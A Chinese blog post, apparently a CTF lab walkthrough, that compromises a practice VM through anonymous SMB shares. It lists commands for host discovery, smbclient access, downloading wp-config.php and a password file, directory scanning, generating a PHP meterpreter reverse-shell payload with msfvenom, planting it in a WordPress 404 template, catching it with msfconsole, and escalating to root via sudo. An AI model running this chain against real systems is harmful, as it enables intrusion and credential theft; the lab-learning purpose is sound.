SMB信息泄露提权

最新推荐文章于 2023-11-17 11:54:46 发布
最新推荐文章于 2023-11-17 11:54:46 发布
阅读量682 收藏 4
点赞数 2
分类专栏: Web漏洞利用 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/112094585
版权

准备工作

镜像下载地址:
链接:https://pan.baidu.com/s/1eKjpvhczXESM1K7mqDv6Tw
提取码:bxps

漏洞复现过程

  1. 使用netdiscover发现存活主机
netdidscover -i eth0

在这里插入图片描述

  1. 使用nmap扫描主机
  • 发现目标主机开放了远程连接端口和smb、mysql服务端口
    在这里插入图片描述
  1. 尝试登陆smb服务收集敏感信息,空指令登陆
    在这里插入图片描述
  • 访问共享目录,一步步地收集敏感信息
smbclient '\\192.168.75.153\print$'
smbclient '\\192.168.75.153\share$'
smbclient '\\192.168.75.153\IPC$'
  • 登陆的密码全部为空
    在这里插入图片描述
  • 可以看到,IPC共享目录虽然能访问,但是用户没有权限读取里面的文件
  • 然后登陆share目录后,发现了大量的信息
  1. 实战中可以逐个查看各个文件的信息,其中这里隐藏信息的文件有deets.txt和wordpress里的wp-config.php文件,使用get命令下载对应的文件
cd wordpress
get wp-config.php
get deets.txt
  • 文件会下载到相应的目录中,wp-config.php中查看到mysql的用户名和密码,在deets.txt中查看到一个不知名的密码(记住,后面登录提权有用)
    在这里插入图片描述
    在这里插入图片描述
  1. 尝试使用该用户名和密码登录mysql,登录失败
  • 目标主机不允许登录mysql服务
    在这里插入图片描述
  1. 发现完敏感信息,我们再使用dirb深入挖掘子目录
dirb http://192.168.75.153
  • 因为mysql不能登录,所以放弃尝试phpmyadmin
  • 碰巧发现了后台登录的网址,尝试使用mysql的用户名和密码进行登录
    在这里插入图片描述
  • 登录成功
    在这里插入图片描述
  1. 进入Appearance目录的editor目录,使用msfvenom命令生成一个shellcode文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.75.153 lport=4444 -f raw
  • 参数说明:-p是利用的漏洞模块,lhost是本机地址,lport是本机开放侦听的端口号,-f是输出的文件格式
    在这里插入图片描述
  • 进入editor目录,更改404Template文件中的内容,点击update file
    在这里插入图片描述
  1. 打开msfconsole,加载漏洞模块,反弹webshell
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 本机ip
run
  • 当运行404页面时,shell实现反弹
    在这里插入图片描述

在这里插入图片描述

  1. 查看/etc/passwd文件,发现有一个togie用户在home用户组
    在这里插入图片描述

  2. 尝试切换到该用户,并键入之前的12345密码
    在这里插入图片描述

  3. 查看sudo能执行那些操作
    在这里插入图片描述

  4. 使用sudo su提权成功,查看flag值
    在这里插入图片描述

平凡的学者
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PoCs-win提权.zip
04-08
4. **权限管理不当**:利用系统权限管理的疏漏,如SMB服务、WMI(Windows Management Instrumentation)或其他系统服务的权限设置不严,攻击者可以滥用这些服务进行提权。 5. **权限令牌窃取**:攻击者获取其他高...
SMB服务信息泄露虚拟文件
04-21
CTF夺旗-SMB信息泄露-靶机渗透实战-所需靶机资源 先解压再导入到虚拟盒子,然后进行实战演练
linux镜像里下载samba,Docker镜像搭建Linux下samba共享目录
weixin_39586353的博客
05-13 541
Samba 是 SMB/CIFS 网络协议的重新实现, 它作为 NFS 的补充使得在 Linux、OS/2、DOS 和 Windows 系统中进行文件共享、打印机共享更容易实现。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。...
SMB信息泄露
qq_39687353的博客
04-10 6927
SMB信息泄露服务攻击
CTF-7.SMB信息泄露
woo233的博客
09-13 554
SMB (Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445SMB协议,计算机可以访问网络资源,下载对应的资源文件对于开放139和445端口的机器一定要注意是否可以直接使用smbclient登录到共享目录查找敏感文件。
CVE-2020-0796 - SMBv3漏洞复现与提权
yangbz123的博客
06-06 4806
CVE-2020-0796 - SMBv3提权 微软发布安全公告,发布了一个最新的SMB远程代码执行漏洞( CVE-2020-0796 )“永恒之黑”,攻击者可以利用漏洞进行提权实现代码执行。 提权准备工作 1、首先下载扫描器,进行检测 下载地址: https://github.com/ollypwn/SMBGhost python3 scanner.py <ip> 将Windows目标机的防火墙关闭,让攻击机可以ping通ip 可以看到 2、下载好可利用的POC https://gi
samba 3.x提权漏洞
→_→
08-17 1268
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1) 利用Samba漏洞,获得目标主机root权限 [实验原理] 1) Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了而已输入的话,就可能允许攻击者以nobody用户的权限执行任意命令.Samba服务端口:139\445. ...
Oracle 低权限数据库账户得到 OS 访问权限 提权利用
09-11
大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问...
MS15-010提权神器
09-24
【标题】"MS15-010提权神器"涉及的是一个著名的Windows系统安全漏洞,该漏洞在2015年被微软公司发布的一项安全更新所标识。这个漏洞允许攻击者通过精心构造的SMB(Server Message Block)请求来提升他们在目标系统上...
提权工具包
06-01
7. **网络侦察**:工具包可能还包括网络侦查工具,帮助黑客收集关于目标系统的更多信息,如开放端口、运行的服务、系统版本等,这些信息对于选择合适的提权策略至关重要。 8. **漏洞更新和社区支持**:一个活跃的提...
SMB信息泄露的利用
Scalzdp的专栏
11-17 785
SMB的协议出现较早,应用较广泛,但是早期计算机协议注重应用的快速建立,而对安全的要求并不太严格,所以很多较老的设备使用了存在漏洞的SMB协议,就会存在安全隐患。我们在SMB漏洞的利用中,主要还是基于msf提供的一些payload,这些payload其实都是别人做好了的,所以用起来特别方便,也从另一个方面反映如果有人要攻击利用SMB漏洞其实也很方便,所以我们在计算机安全防护上还需进行更多的考虑,必要的安全设置应该保留,不要为了一时方便,关闭所有安全防护的护盾。
6.15moon123靶场与smb信息泄露靶场(未完)
ailkli的博客
06-15 120
根据appscan测试结果进行漏洞复现针对www.moon123.com sql盲注使用burp 用cookie绕过验证码先删除cookie 中验证码的内容进行放包后得到没有验证码的页面使用burp中的暴力破解进行破解密码因为系统管理员用户名一般不改此外,如果出现的不是验证码,而是要短信接验证码,可以使用短信接码平台而逻辑漏洞,是机器识别不了的比如写代码时忽略商品数不能为负导致逻辑漏洞可以改购买数量为负导致0元 购物。
赛虎学院信息安全SMB远程代码执行漏洞 CVE-2020-0796 复现与分析
saihuxueyuan的博客
05-27 703
一、前言 2020年3月10日,自思科talos泄露了一个微软smb v3.1协议漏洞,随即在3月12日,微软公布了紧急修复补丁。 该漏洞编号为CVE-2020-0796,名称为“smbghost”。是一个针对Windows的 SMBv3 客户端与服务端远程代码执行漏洞。其漏洞原理是Microsoft服务器消息块3.1.1(即SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。SMB 3.1.1协议中处理压缩消息时,对其中数据
CTF-SMB信息泄露【简单易懂】
不知名白帽的博客
08-17 2770
CTF-SMB信息泄露【简单易懂】
hydra字典破解smb协议及后续提权
wlopghost的博客
03-25 1199
首先先将kali与win-xp设置为同一网段使之两者ping通(在主机上将vmnet1和8都设置为自动获取ip,在虚拟机内将两台虚拟机都设置为桥接模式,此时两台虚拟机都有了一个ip但网段不同,查看kali网段然后手动将win-xp的网段改到和kali一样的网段即可。-e nsr 可选选项,n:空密码试探,s:使用指定用户和密码试探,r:指定密码与用户名相反。-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
TRY HACK ME | Skynet「SMB信息搜集+TAR提权
AKAHRZ的博客
05-14 841
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起å进步、一起GET THE FLAG! THM靶场:Skynet「SMB信息搜集+TAR提权」THM靶场:SkynetSteelmountain 靶场通关小结 THM靶场:Skynet 这个房间是一.
Vulnhub靶机渗透之权限提取,SMB泄露问题-靶场Breakout--学习笔记
ZhangAweio的博客
04-09 723
Vulnhub的这个靶场非常适合新手的朋友,里面包含了 信息收集,密码解密,SMB共享文件泄露备份文件泄露,通过泄露的密码进行Linux提权
smb信息泄露实战
qq_23347209的博客
05-28 447
文章目录环境准备一、服务器信息搜集二、网站信息搜集1.dirb目录扫描2.浏览网站——尝试登录后台三、后台上传点上传webshell四、The Metasploit Framework的使用1.msf生成php的木马2.建立木马监听端找路径访问——木马上线五、提权 环境准备 本次环境使用的是vulnhub靶场里面的Lazysysadmin 靶场地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/ 靶机ip :192.168.0.103 攻击机 parr
SMB服务信息泄露
wwxxss
11-03 498
SMB信息泄露的详细渗透过程
服务smb信息读取出错
最新发布
12-10
根据提供的引用内容,服务smb信息读取出错可能是由于SMB 3.0添加的Secure Negotiate功能引起的。这个功能需要所有SMBv2服务器正确签名错误响应,但某些第三方文件服务器不会返回已签名的错误响应,因此连接失败。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值